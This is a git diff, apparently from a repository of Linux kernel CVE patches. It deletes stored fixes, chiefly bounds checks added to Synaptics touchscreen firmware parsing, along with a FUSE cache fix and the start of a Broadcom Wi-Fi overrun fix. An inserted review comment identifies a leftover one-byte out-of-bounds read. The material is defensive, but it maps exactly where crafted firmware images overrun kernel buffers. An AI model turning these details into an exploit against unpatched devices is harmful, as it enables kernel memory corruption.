*/ -+static int in_bounds(unsigned long offset, -+ unsigned long size, -+ unsigned long bound) -+{ -+ if (offset > bound || size > bound) { -+ pr_err("%s: %lu or %lu > %lu\n", __func__, offset, size, bound); -+ return 0; -+ } -+ if (offset > (bound - size)) { -+ pr_err("%s: %lu > %lu - %lu\n", __func__, offset, size, bound); -+ return 0; -+ } -+ return 1; -+} -+ - static unsigned int le_to_uint(const unsigned char *ptr) - { - return (unsigned int)ptr[0] + -@@ -770,8 +786,10 @@ static void fwu_compare_partition_tables(void) - return; - } - --static void fwu_parse_partition_table(const unsigned char *partition_table, -- struct block_count *blkcount, struct physical_address *phyaddr) -+static int fwu_parse_partition_table(const unsigned char *partition_table, -+ unsigned long len, -+ struct block_count *blkcount, -+ struct physical_address *phyaddr) - { - unsigned char ii; - unsigned char index; -@@ -784,6 +802,11 @@ static void fwu_parse_partition_table(const unsigned char *partition_table, - tp_log_debug("%s: in!\n",__func__); - for (ii = 0; ii < fwu->partitions; ii++) { - index = ii * 8 + 2; -+ if (!in_bounds(index, sizeof(*ptable), len)) { -+ pr_err("%s: %d/%d not in bounds\n", __func__, ii, -+ fwu->partitions); -+ return -EINVAL; -+ } - ptable = (struct partition_table *)&partition_table[index]; - partition_length = ptable->partition_length_15_8 << 8 | - ptable->partition_length_7_0; -@@ -792,7 +815,7 @@ static void fwu_parse_partition_table(const unsigned char *partition_table, - dev_dbg(rmi4_data->pdev->dev.parent, - "%s: Partition entry %d:\n", - __func__, ii); -- for (offset = 0; offset < 8; offset++) { -+ for (offset = 0; offset < sizeof(*ptable); offset++) { - dev_dbg(rmi4_data->pdev->dev.parent, - "%s: 0x%02x\n", - __func__, -@@ -854,28 +877,36 @@ static void fwu_parse_partition_table(const unsigned char *partition_table, - }; - } - -- return; -+ return 0; - } - --static void fwu_parse_image_header_10_bl_container(const unsigned char *image) -+static int 
fwu_parse_image_header_10_bl_container(const unsigned char *image) - { - unsigned char ii; - unsigned char num_of_containers; - unsigned int addr; - unsigned int container_id; -+ unsigned int content_offset; - unsigned int length; - const unsigned char *content; - struct container_descriptor *descriptor; - -+ if (fwu->img.bootloader.size < 4) -+ return -ENOENT; - num_of_containers = (fwu->img.bootloader.size - 4) / 4; - - for (ii = 1; ii <= num_of_containers; ii++) { - addr = le_to_uint(fwu->img.bootloader.data + (ii * 4)); -+ if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size)) -+ return -EINVAL; - descriptor = (struct container_descriptor *)(image + addr); - container_id = descriptor->container_id[0] | - descriptor->container_id[1] << 8; -- content = image + le_to_uint(descriptor->content_address); -+ content_offset = le_to_uint(descriptor->content_address); - length = le_to_uint(descriptor->content_length); -+ if (!in_bounds(content_offset, length, fwu->image_size)) -+ return -EINVAL; -+ content = image + content_offset; - switch (container_id) { - case BL_CONFIG_CONTAINER: - case GLOBAL_PARAMETERS_CONTAINER: -@@ -892,10 +923,10 @@ static void fwu_parse_image_header_10_bl_container(const unsigned char *image) - }; - } - -- return; -+ return 0; - } - --static void fwu_parse_image_header_10(void) -+static int fwu_parse_image_header_10(void) - { - unsigned char ii; - unsigned char num_of_containers; -@@ -903,6 +934,7 @@ static void fwu_parse_image_header_10(void) - unsigned int offset; - unsigned int container_id; - unsigned int length; -+ unsigned int content_offset; - const unsigned char *image; - const unsigned char *content; - struct container_descriptor *descriptor; -@@ -911,25 +943,35 @@ static void fwu_parse_image_header_10(void) - tp_log_debug("%s: in!\n",__func__); - image = fwu->image; - header = (struct image_header_10 *)image; -- -+ if (fwu->image_size < sizeof(*header)) -+ return -EINVAL; - fwu->img.checksum = le_to_uint(header->checksum); - - 
/* address of top level container */ - offset = le_to_uint(header->top_level_container_start_addr); - descriptor = (struct container_descriptor *)(image + offset); -+ if (!in_bounds(offset, sizeof(*descriptor), fwu->image_size)) -+ return -EINVAL; - - /* address of top level container content */ - offset = le_to_uint(descriptor->content_address); - num_of_containers = le_to_uint(descriptor->content_length) / 4; - - for (ii = 0; ii < num_of_containers; ii++) { -+ if (!in_bounds(offset, 4, fwu->image_size)) -+ return -EINVAL; - addr = le_to_uint(image + offset); - offset += 4; -+ if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size)) -+ return -EINVAL; - descriptor = (struct container_descriptor *)(image + addr); - container_id = descriptor->container_id[0] | - descriptor->container_id[1] << 8; -- content = image + le_to_uint(descriptor->content_address); -+ content_offset = le_to_uint(descriptor->content_address); - length = le_to_uint(descriptor->content_length); -+ if (!in_bounds(content_offset, length, fwu->image_size)) -+ return -EINVAL; -+ content = image + content_offset; - switch (container_id) { - case UI_CONTAINER: - case CORE_CODE_CONTAINER: -@@ -945,7 +987,8 @@ static void fwu_parse_image_header_10(void) - fwu->img.bl_version = *content; - fwu->img.bootloader.data = content; - fwu->img.bootloader.size = length; -- fwu_parse_image_header_10_bl_container(image); -+ if (fwu_parse_image_header_10_bl_container(image)) -+ return -EINVAL; - break; - case GUEST_CODE_CONTAINER: - fwu->img.contains_guest_code = true; -@@ -964,6 +1007,8 @@ static void fwu_parse_image_header_10(void) - break; - case GENERAL_INFORMATION_CONTAINER: - fwu->img.contains_firmware_id = true; -+ if (length < 4 + 4) -+ return -EINVAL; - fwu->img.firmware_id = le_to_uint(content + 4); - break; - default: -@@ -971,10 +1016,10 @@ static void fwu_parse_image_header_10(void) - } - } - -- return; -+ return 0; - } - --static void fwu_parse_image_header_05_06(void) -+static int 
fwu_parse_image_header_05_06(void) - { - int retval; - const unsigned char *image; -@@ -983,6 +1028,8 @@ static void fwu_parse_image_header_05_06(void) - - tp_log_debug("%s: in!\n",__func__); - image = fwu->image; -+ if (fwu->image_size < sizeof(*header)) -+ return -EINVAL; - header = (struct image_header_05_06 *)image; - - fwu->img.checksum = le_to_uint(header->checksum); -@@ -995,18 +1042,51 @@ static void fwu_parse_image_header_05_06(void) - - fwu->img.ui_firmware.size = le_to_uint(header->firmware_size); - if (fwu->img.ui_firmware.size) { -- fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET; -- if (fwu->img.contains_bootloader) -- fwu->img.ui_firmware.data += fwu->img.bootloader_size; -+ unsigned int ui_firmware_offset = IMAGE_AREA_OFFSET; -+ -+ if (fwu->img.contains_bootloader) { -+ if (!in_bounds(ui_firmware_offset, -+ fwu->img.bootloader_size, -+ fwu->image_size)) { -+ return -EINVAL; -+ } -+ ui_firmware_offset += fwu->img.bootloader_size; -+ } -+ if (!in_bounds(ui_firmware_offset, -+ fwu->img.ui_firmware.size, -+ fwu->image_size)) { -+ return -EINVAL; -+ } -+ fwu->img.ui_firmware.data = image + ui_firmware_offset; - } - -- if ((fwu->img.bl_version == BL_V6) && header->options_tddi) -+ if ((fwu->img.bl_version == BL_V6) && header->options_tddi) { -+ if (!in_bounds(IMAGE_AREA_OFFSET, -+ fwu->img.ui_firmware.size, -+ fwu->image_size)) { -+ return -EINVAL; -+ } - fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET; -+ } - - fwu->img.ui_config.size = le_to_uint(header->config_size); - if (fwu->img.ui_config.size) { -- fwu->img.ui_config.data = fwu->img.ui_firmware.data + -+ unsigned int ui_firmware_end; -+ -+ if (fwu->img.ui_firmware.data < image) -+ return -EINVAL; -+ if (!in_bounds(fwu->img.ui_firmware.data - image, -+ fwu->img.ui_firmware.size, -+ fwu->image_size)) { -+ return -EINVAL; -+ } -+ ui_firmware_end = fwu->img.ui_firmware.data - image + - fwu->img.ui_firmware.size; -+ if (!in_bounds(ui_firmware_end, fwu->img.ui_config.size, -+ 
fwu->image_size)) { -+ return -EINVAL; -+ } -+ fwu->img.ui_config.data = image + ui_firmware_end; - } - - if ((fwu->img.bl_version == BL_V5 && fwu->img.contains_bootloader) || -@@ -1018,6 +1098,11 @@ static void fwu_parse_image_header_05_06(void) - if (fwu->img.contains_disp_config) { - fwu->img.disp_config_offset = le_to_uint(header->dsp_cfg_addr); - fwu->img.dp_config.size = le_to_uint(header->dsp_cfg_size); -+ if (!in_bounds(fwu->img.disp_config_offset, -+ fwu->img.dp_config.size, -+ fwu->image_size)) { -+ return -EINVAL; -+ } - fwu->img.dp_config.data = image + fwu->img.disp_config_offset; - } else { - retval = secure_memcpy(fwu->img.cstmr_product_id, -@@ -1050,28 +1135,52 @@ static void fwu_parse_image_header_05_06(void) - fwu->img.product_id[PRODUCT_ID_SIZE] = 0; - - fwu->img.lockdown.size = LOCKDOWN_SIZE; -+ if (LOCKDOWN_SIZE > IMAGE_AREA_OFFSET) -+ return -EINVAL; -+ if (fwu->image_size < IMAGE_AREA_OFFSET) -+ return -EINVAL; - fwu->img.lockdown.data = image + IMAGE_AREA_OFFSET - LOCKDOWN_SIZE; - -- return; -+ return 0; - } - - static int fwu_parse_image_info(void) - { - struct image_header_10 *header; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -+ unsigned int image_size = 0; - -- tp_log_debug("%s: in!\n",__func__); -+ tp_log_debug("%s: in!\n", __func__); - header = (struct image_header_10 *)fwu->image; -+ if (!header) { -+ tp_log_debug("%s: Invalid header\n", __func__); -+ return -EINVAL; -+ } - -+ image_size = fwu->image_size; -+ if (image_size < sizeof(struct image_header_05_06) && -+ image_size < sizeof(struct image_header_10)) { -+ tp_log_debug("header too small: %u < (%lu, %lu)", -+ image_size, sizeof(struct image_header_05_06), -+ sizeof(struct image_header_10)); -+ return -EINVAL; -+ } -+ /* This is clearing img, not image. 
*/ - memset(&fwu->img, 0x00, sizeof(fwu->img)); - - switch (header->major_header_version) { - case IMAGE_HEADER_VERSION_10: -- fwu_parse_image_header_10(); -+ if (fwu_parse_image_header_10()) { -+ tp_log_debug("%s:error parsing v10 header\n", __func__); -+ return -EINVAL; -+ } - break; - case IMAGE_HEADER_VERSION_05: - case IMAGE_HEADER_VERSION_06: -- fwu_parse_image_header_05_06(); -+ if (fwu_parse_image_header_05_06()) { -+ tp_log_debug("%s:error parsing v56 header\n", __func__); -+ return -EINVAL; -+ } - break; - default: - dev_err(rmi4_data->pdev->dev.parent, -@@ -1088,9 +1197,13 @@ static int fwu_parse_image_info(void) - return -EINVAL; - } - -- fwu_parse_partition_table(fwu->img.fl_config.data, -- &fwu->img.blkcount, &fwu->img.phyaddr); -- -+ if (fwu_parse_partition_table(fwu->img.fl_config.data, -+ fwu->img.fl_config.size, -+ &fwu->img.blkcount, -+ &fwu->img.phyaddr)) { -+ tp_log_debug("%s:Error parsing ptable\n", __func__); -+ return -EINVAL; -+ } - fwu_compare_partition_tables(); - } else { - fwu->new_partition_table = false; -@@ -1669,7 +1782,9 @@ static int fwu_read_f34_v7_queries(void) - return retval; - } - -- fwu_parse_partition_table(ptable, &fwu->blkcount, &fwu->phyaddr); -+ if (fwu_parse_partition_table(ptable, fwu->partition_table_bytes, -+ &fwu->blkcount, &fwu->phyaddr)) -+ return -EINVAL; - - return 0; - } -@@ -3330,6 +3445,7 @@ static int fwu_start_reflash(void) - __func__, fw_entry->size); - - fwu->image = fw_entry->data; -+ fwu->image_size = fw_entry->size; - } - - retval = fwu_parse_image_info(); -@@ -4203,8 +4319,8 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - &fwu->fwu_work); - #endif - -- retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj, -- &dev_attr_data); -+ retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj, -+ &dev_attr_data); - if (retval < 0) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to create sysfs bin file\n", 
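Review bot: in_bounds() returns 1 for a zero `size` at `offset == bound`, and in fwu_parse_image_header_10() the container loop then reads `*content` (`fwu->img.bl_version = *content;`) with no minimum-length check, so a zero-length container placed at the very end of the image still reads one byte past it. The patch already guards the firmware-id read with `if (length < 4 + 4)`; the same pattern before the bl_version read, `if (length < 1) return -EINVAL;`, would cover it (the case label for that branch is outside the visible hunk). The second pr_err in in_bounds() also passes `offset, size, bound` to the format `%lu > %lu - %lu`, which logs the operands swapped; `offset, bound, size` matches the comparison being reported.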
diff --git a/Patches/Linux_CVEs/CVE-2016-8458/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8458/3.18/0002.patch deleted file mode 100644 index 40ae865a..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8458/3.18/0002.patch +++ /dev/null 
@@ -1,454 +0,0 @@
-From 11ab3add6cfb1ef752ac38adf1b4bf15617772e9 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Tue, 8 Nov 2016 15:19:32 -0800
-Subject: [PATCH] input: synaptics_dsx: add update bounds checks.
-
-Firmware updates contain offsets that are parsed
-by the kernel driver. Ensure all offsets are within
-the bounds of the firmware update.
-
-TESTED: Forced a firmware update by removing
-same-firmware check. Firmware update succeeded.
-
-Bug: 31525965
-Bug: 31968442
-Change-Id: I287f494d973868f6be28799bc2613ff2201b0717
-Signed-off-by: Andrew Chant
----
- .../synaptics_dsx_fw_update.c | 183 +++++++++++++++++----
- 1 file changed, 154 insertions(+), 29 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-index 05f13b427739b..f7d5dbdd69b53 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-@@ -771,6 +771,21 @@ static struct synaptics_rmi4_fwu_handle *fwu;
- DECLARE_COMPLETION(fwu_remove_complete);
- DEFINE_MUTEX(fwu_sysfs_mutex);
-
-+/* Check offset + size <= bound. true if in bounds, false otherwise. */
-+static bool in_bounds(unsigned long offset, unsigned long size,
-+ unsigned long bound)
-+{
-+ if (offset > bound || size > bound) {
-+ pr_err("%s: %lu or %lu > %lu\n", __func__, offset, size, bound);
-+ return false;
-+ }
-+ if (offset > (bound - size)) {
-+ pr_err("%s: %lu > %lu - %lu\n", __func__, offset, size, bound);
-+ return false;
-+ }
-+ return true;
-+}
-+
- #ifdef HTC_FEATURE
- static uint32_t syn_crc(uint16_t *data, uint32_t len)
- {
-@@ -966,8 +981,10 @@ static void fwu_compare_partition_tables(void)
- return;
- }
-
--static void fwu_parse_partition_table(const unsigned char *partition_table,
-- struct block_count *blkcount, struct physical_address *phyaddr)
-+static int fwu_parse_partition_table(const unsigned char *partition_table,
-+ unsigned long len,
-+ struct block_count *blkcount,
-+ struct physical_address *phyaddr)
- {
- unsigned char ii;
- unsigned char index;
-@@ -979,6 +996,11 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
-
- for (ii = 0; ii < fwu->partitions; ii++) {
- index = ii * 8 + 2;
-+ if (!in_bounds(index, sizeof(*ptable), len)) {
-+ pr_err("%s: %d/%d not in bounds\n", __func__, ii,
-+ fwu->partitions);
-+ return -EINVAL;
-+ }
- ptable = (struct partition_table *)&partition_table[index];
- partition_length = ptable->partition_length_15_8 << 8 |
- ptable->partition_length_7_0;
-@@ -987,7 +1009,7 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- dev_dbg(rmi4_data->pdev->dev.parent,
- "%s: Partition entry %d:\n",
- __func__, ii);
-- for (offset = 0; offset < 8; offset++) {
-+ for (offset = 0; offset < sizeof(*ptable); offset++) {
- dev_dbg(rmi4_data->pdev->dev.parent,
- "%s: 0x%02x\n",
- __func__,
-@@ -1077,16 +1099,17 @@ static void fwu_parse_partition_table(const unsigned char *partition_table,
- };
- }
-
-- return;
-+ return 0;
- }
-
--static void fwu_parse_image_header_10_utility(const unsigned char *image)
-+static int fwu_parse_image_header_10_utility(const unsigned char *image)
- {
- unsigned char ii;
- unsigned char num_of_containers;
- unsigned int addr;
- unsigned int container_id;
- unsigned int length;
-+ unsigned int content_offset;
- const unsigned char *content;
- struct container_descriptor *descriptor;
-
-@@ -1099,15 +1122,22 @@ static void fwu_parse_image_header_10_utility(const unsigned char *image)
- if (ii >= MAX_UTILITY_PARAMS)
- continue;
- addr = le_to_uint(fwu->img.utility.data + (ii * 4));
-+ if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size))
-+ return -EINVAL;
- descriptor = (struct container_descriptor *)(image + addr);
- container_id = descriptor->container_id[0] |
- descriptor->container_id[1] << 8;
-- content = image + le_to_uint(descriptor->content_address);
-+ content_offset = le_to_uint(descriptor->content_address);
- length = le_to_uint(descriptor->content_length);
-+ if (!in_bounds(content_offset, length, fwu->image_size))
-+ return -EINVAL;
-+ content = image + content_offset;
- switch (container_id) {
- case UTILITY_PARAMETER_CONTAINER:
- fwu->img.utility_param[ii].data = content;
- fwu->img.utility_param[ii].size = length;
-+ if (length < sizeof(content[0]))
-+ return -EINVAL;
- fwu->img.utility_param_id[ii] = content[0];
- break;
- default:
-@@ -1115,28 +1145,36 @@ static void fwu_parse_image_header_10_utility(const unsigned char *image)
- };
- }
-
-- return;
-+ return 0;
- }
-
--static void fwu_parse_image_header_10_bootloader(const unsigned char *image)
-+static int fwu_parse_image_header_10_bootloader(const unsigned char *image)
- {
- unsigned char ii;
- unsigned char num_of_containers;
- unsigned int addr;
- unsigned int container_id;
- unsigned int length;
-+ unsigned int content_offset;
- const unsigned char *content;
- struct container_descriptor *descriptor;
-
-+ if (fwu->img.bootloader.size < 4)
-+ return -EINVAL;
- num_of_containers = (fwu->img.bootloader.size - 4) / 4;
-
- for (ii = 1; ii <= num_of_containers; ii++) {
- addr = le_to_uint(fwu->img.bootloader.data + (ii * 4));
-+ if (!in_bounds(addr, sizeof(*descriptor), fwu->image_size))
-+ return -EINVAL;
- descriptor = (struct container_descriptor *)(image + addr);
- container_id = descriptor->container_id[0] |
- descriptor->container_id[1] << 8;
-- content = image + le_to_uint(descriptor->content_address);
-+ content_offset = le_to_uint(descriptor->content_address);
- length = le_to_uint(descriptor->content_length);
-+ if (!in_bounds(content_offset, length, fwu->image_size))
-+ return -EINVAL;
-+ content = image + content_offset;
- switch (container_id) {
- case BL_IMAGE_CONTAINER:
- fwu->img.bl_image.data = content;
-@@ -1157,29 +1195,36 @@ static void fwu_parse_image_header_10_bootloader(const unsigned char *image)
- };
- }
-
-- return;
-+ return 0;
- }
-
--static void fwu_parse_image_header_10(void)
-+static int fwu_parse_image_header_10(void)
- {
- unsigned char ii;
- unsigned char num_of_containers;
- unsigned int addr;
- unsigned int offset;
-+ unsigned int content_offset;
- unsigned int container_id;
- unsigned int length;
-+ unsigned int image_size;
- const unsigned char *image;
- const unsigned char *content;
- struct container_descriptor *descriptor;
- struct image_header_10 *header;
-
- image = fwu->image;
-+ image_size = fwu->image_size;
-+ if (image_size < sizeof(*header))
-+ return -EINVAL;
- header = (struct image_header_10 *)image;
-
- fwu->img.checksum = le_to_uint(header->checksum);
-
- /* address of top level container */
- offset = le_to_uint(header->top_level_container_start_addr);
-+ if (!in_bounds(offset, sizeof(*descriptor), image_size))
-+ return -EINVAL;
- descriptor = (struct container_descriptor *)(image + offset);
-
- /* address of top level container content */
-@@ -1187,13 +1232,20 @@ static void fwu_parse_image_header_10(void)
- num_of_containers = le_to_uint(descriptor->content_length) / 4;
-
- for (ii = 0; ii < num_of_containers; ii++) {
-+ if (!in_bounds(offset, 4, image_size))
-+ return -EINVAL;
- addr = le_to_uint(image + offset);
- offset += 4;
-+ if (!in_bounds(addr, sizeof(*descriptor), image_size))
-+ return -EINVAL;
- descriptor = (struct container_descriptor *)(image + addr);
- container_id = descriptor->container_id[0] |
- descriptor->container_id[1] << 8;
-- content = image + le_to_uint(descriptor->content_address);
-+ content_offset = le_to_uint(descriptor->content_address);
- length = le_to_uint(descriptor->content_length);
-+ if (!in_bounds(content_offset, length, image_size))
-+ return -EINVAL;
-+ content = image + content_offset;
- switch (container_id) {
- case UI_CONTAINER:
- case CORE_CODE_CONTAINER:
-@@ -1209,12 +1261,14 @@ static void fwu_parse_image_header_10(void)
- fwu->img.bl_version = *content;
- fwu->img.bootloader.data = content;
- fwu->img.bootloader.size = length;
-- fwu_parse_image_header_10_bootloader(image);
-+ if (fwu_parse_image_header_10_bootloader(image))
-+ return -EINVAL;
- break;
- case UTILITY_CONTAINER:
- fwu->img.utility.data = content;
- fwu->img.utility.size = length;
-- fwu_parse_image_header_10_utility(image);
-+ if (fwu_parse_image_header_10_utility(image))
-+ return -EINVAL;
- break;
- case GUEST_CODE_CONTAINER:
- fwu->img.contains_guest_code = true;
-@@ -1239,6 +1293,8 @@ static void fwu_parse_image_header_10(void)
- break;
- case GENERAL_INFORMATION_CONTAINER:
- fwu->img.contains_firmware_id = true;
-+ if (length < 4 + 4)
-+ return -EINVAL;
- fwu->img.firmware_id = le_to_uint(content + 4);
- break;
- default:
-@@ -1246,10 +1302,10 @@ static void fwu_parse_image_header_10(void)
- }
- }
-
-- return;
-+ return 0;
- }
-
--static void fwu_parse_image_header_05_06(void)
-+static int fwu_parse_image_header_05_06(void)
- {
- int retval;
- const unsigned char *image;
-@@ -1257,6 +1313,8 @@ static void fwu_parse_image_header_05_06(void)
- struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-
- image = fwu->image;
-+ if (fwu->image_size < sizeof(*header))
-+ return -EINVAL;
- header = (struct image_header_05_06 *)image;
-
- fwu->img.checksum = le_to_uint(header->checksum);
-@@ -1269,18 +1327,51 @@ static void fwu_parse_image_header_05_06(void)
-
- fwu->img.ui_firmware.size = le_to_uint(header->firmware_size);
- if (fwu->img.ui_firmware.size) {
-- fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET;
-- if (fwu->img.contains_bootloader)
-- fwu->img.ui_firmware.data += fwu->img.bootloader_size;
-+ unsigned int ui_firmware_offset = IMAGE_AREA_OFFSET;
-+
-+ if (fwu->img.contains_bootloader) {
-+ if (!in_bounds(ui_firmware_offset,
-+ fwu->img.bootloader_size,
-+ fwu->image_size)) {
-+ return -EINVAL;
-+ }
-+ ui_firmware_offset += fwu->img.bootloader_size;
-+ }
-+ if (!in_bounds(ui_firmware_offset,
-+ fwu->img.ui_firmware.size,
-+ fwu->image_size)) {
-+ return -EINVAL;
-+ }
-+ fwu->img.ui_firmware.data = image + ui_firmware_offset;
- }
-
-- if ((fwu->img.bl_version == BL_V6) && header->options_tddi)
-+ if ((fwu->img.bl_version == BL_V6) && header->options_tddi) {
-+ if (!in_bounds(IMAGE_AREA_OFFSET,
-+ fwu->img.ui_firmware.size,
-+ fwu->image_size)) {
-+ return -EINVAL;
-+ }
- fwu->img.ui_firmware.data = image + IMAGE_AREA_OFFSET;
-+ }
-
- fwu->img.ui_config.size = le_to_uint(header->config_size);
- if (fwu->img.ui_config.size) {
-- fwu->img.ui_config.data = fwu->img.ui_firmware.data +
-+ unsigned int ui_firmware_end;
-+
-+ if (fwu->img.ui_firmware.data < image)
-+ return -EINVAL;
-+ if (!in_bounds(fwu->img.ui_firmware.data - image,
-+ fwu->img.ui_firmware.size,
-+ fwu->image_size)) {
-+ return -EINVAL;
-+ }
-+ ui_firmware_end = fwu->img.ui_firmware.data - image +
- fwu->img.ui_firmware.size;
-+ if (!in_bounds(ui_firmware_end, fwu->img.ui_config.size,
-+ fwu->image_size)) {
-+ return -EINVAL;
-+ }
-+ fwu->img.ui_config.data = image + ui_firmware_end;
- }
-
- if ((fwu->img.bl_version == BL_V5 && fwu->img.contains_bootloader) ||
-@@ -1292,6 +1383,11 @@ static void fwu_parse_image_header_05_06(void)
- if (fwu->img.contains_disp_config) {
- fwu->img.disp_config_offset = le_to_uint(header->dsp_cfg_addr);
- fwu->img.dp_config.size = le_to_uint(header->dsp_cfg_size);
-+ if (!in_bounds(fwu->img.disp_config_offset,
-+ fwu->img.dp_config.size,
-+ fwu->image_size)) {
-+ return -EINVAL;
-+ }
- fwu->img.dp_config.data = image + fwu->img.disp_config_offset;
- } else {
- retval = secure_memcpy(fwu->img.cstmr_product_id,
-@@ -1323,28 +1419,41 @@ static void fwu_parse_image_header_05_06(void)
- }
- fwu->img.product_id[PRODUCT_ID_SIZE] = 0;
-
-+ if (LOCKDOWN_SIZE > IMAGE_AREA_OFFSET)
-+ return -EINVAL;
-+ if (fwu->image_size < IMAGE_AREA_OFFSET)
-+ return -EINVAL;
- fwu->img.lockdown.size = LOCKDOWN_SIZE;
- fwu->img.lockdown.data = image + IMAGE_AREA_OFFSET - LOCKDOWN_SIZE;
-
-- return;
-+ return 0;
- }
-
- static int fwu_parse_image_info(void)
- {
-+ int parse_retval;
- struct image_header_10 *header;
- struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+ unsigned int image_size = 0;
-
- header = (struct image_header_10 *)fwu->image;
--
-+ if (!header)
-+ return -EINVAL;
-+ image_size = fwu->image_size;
-+ if (image_size < sizeof(struct image_header_05_06) &&
-+ image_size < sizeof(struct image_header_10)) {
-+ return -EINVAL;
-+ }
-+ /* This is clearing img, not image. */
- memset(&fwu->img, 0x00, sizeof(fwu->img));
-
- switch (header->major_header_version) {
- case IMAGE_HEADER_VERSION_10:
-- fwu_parse_image_header_10();
-+ parse_retval = fwu_parse_image_header_10();
- break;
- case IMAGE_HEADER_VERSION_05:
- case IMAGE_HEADER_VERSION_06:
-- fwu_parse_image_header_05_06();
-+ parse_retval = fwu_parse_image_header_05_06();
- break;
- default:
- dev_err(rmi4_data->pdev->dev.parent,
-@@ -1353,6 +1462,10 @@ static int fwu_parse_image_info(void)
- return -EINVAL;
- }
-
-+ if (parse_retval != 0) {
-+ return -EINVAL;
-+ }
-+
- if (fwu->bl_version == BL_V7 || fwu->bl_version == BL_V8) {
- if (!fwu->img.contains_flash_config) {
- dev_err(rmi4_data->pdev->dev.parent,
-@@ -1361,9 +1474,12 @@ static int fwu_parse_image_info(void)
- return -EINVAL;
- }
-
-- fwu_parse_partition_table(fwu->img.fl_config.data,
-- &fwu->img.blkcount, &fwu->img.phyaddr);
--
-+ if (fwu_parse_partition_table(fwu->img.fl_config.data,
-+ fwu->img.fl_config.size,
-+ &fwu->img.blkcount,
-+ &fwu->img.phyaddr)) {
-+ return -EINVAL;
-+ }
- fwu_compare_partition_tables();
- } else {
- fwu->new_partition_table = false;
-@@ -1980,7 +2096,11 @@ static int fwu_read_f34_v7_queries(void)
- return retval;
- }
-
-- fwu_parse_partition_table(ptable, &fwu->blkcount, &fwu->phyaddr);
-+ if (fwu_parse_partition_table(ptable, fwu->partition_table_bytes,
-+ &fwu->blkcount, &fwu->phyaddr)) {
-+ kfree(ptable);
-+ return -EINVAL;
-+ }
-
- if (fwu->blkcount.dp_config)
- fwu->flash_properties.has_disp_config = 1;
-@@ -3209,6 +3329,9 @@ static int fwu_write_utility_parameter(void)
- struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-
- utility_param_size = fwu->blkcount.utility_param * fwu->block_size;
-+ /* See remaining_size below for reason for '4' */
-+ if (utility_param_size < 4)
-+ return -EINVAL;
- retval = fwu_allocate_read_config_buf(utility_param_size);
- if (retval < 0)
- return retval;
-@@ -4910,6 +5033,7 @@ int synaptics_config_updater(struct synaptics_dsx_board_data *bdata)
-
- rmi4_data->stay_awake = true;
-
-+ memset(config_id, 0, sizeof(config_id));
- if (fwu->bl_version == BL_V7)
- config_id_size = V7_CONFIG_ID_SIZE;
- else
-@@ -4928,6 +5052,7 @@ int synaptics_config_updater(struct synaptics_dsx_board_data *bdata)
- }
-
- memset(str_buf, 0, sizeof(str_buf));
-+ memset(tmp_buf, 0, sizeof(tmp_buf));
- for (ii = 0; ii < config_id_size; ii++) {
- snprintf(tmp_buf, 3, "%02x ", config_id[ii]);
- strlcat(str_buf, tmp_buf, sizeof(str_buf));
diff --git a/Patches/Linux_CVEs/CVE-2016-8463/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8463/ANY/0001.patch
deleted file mode 100644
index 0df93c6b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8463/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From cd0fa86de6ca1d40c0a93d86d1c0f7846e8a9a10 Mon Sep 17 00:00:00 2001
-From: Laura Abbott
-Date: Fri, 3 Jan 2014 10:47:00 -0800
-Subject: fs: fuse: Add replacment for CMA pages into the LRU cache
-
-CMA pages are currently replaced in the FUSE file system since
-FUSE may hold on to CMA pages for a long time, preventing migration.
-The replacement page is added to the file cache but not the LRU
-cache. This may prevent the page from being properly aged and dropped,
-creating poor performance under tight memory condition. Fix this by
-adding the new page to the LRU cache after creation.
-
-Change-Id: Ib349abf1024d48386b835335f3fbacae040b6241
-CRs-Fixed: 586855
-Signed-off-by: Laura Abbott
----
- fs/fuse/file.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/fuse/file.c b/fs/fuse/file.c
-index e231a7f..3411ed8 100644
---- a/fs/fuse/file.c
-+++ b/fs/fuse/file.c
-@@ -822,6 +822,8 @@ static int fuse_readpages_fill(void *_data, struct page *page)
- lock_page(newpage);
- put_page(newpage);
-
-+ lru_cache_add_file(newpage);
-+
- /* finally release the old page and swap pointers */
- unlock_page(oldpage);
- page_cache_release(oldpage);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8464/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8464/3.10/0001.patch
deleted file mode 100644
index 41a86e5a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8464/3.10/0001.patch
+++ /dev/null
@@ -1,146 +0,0 @@
-From cbf66a616bb08cc6c932e4122f3271df83e253bb Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Tue, 25 Oct 2016 13:33:18 -0700
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in private command
- path
-
-buffer overrun case found when length parameter manipulated.
-
-1. if input parameter buffer length is less than 4k,
-then allocate 4k by default. It help to get enough margin
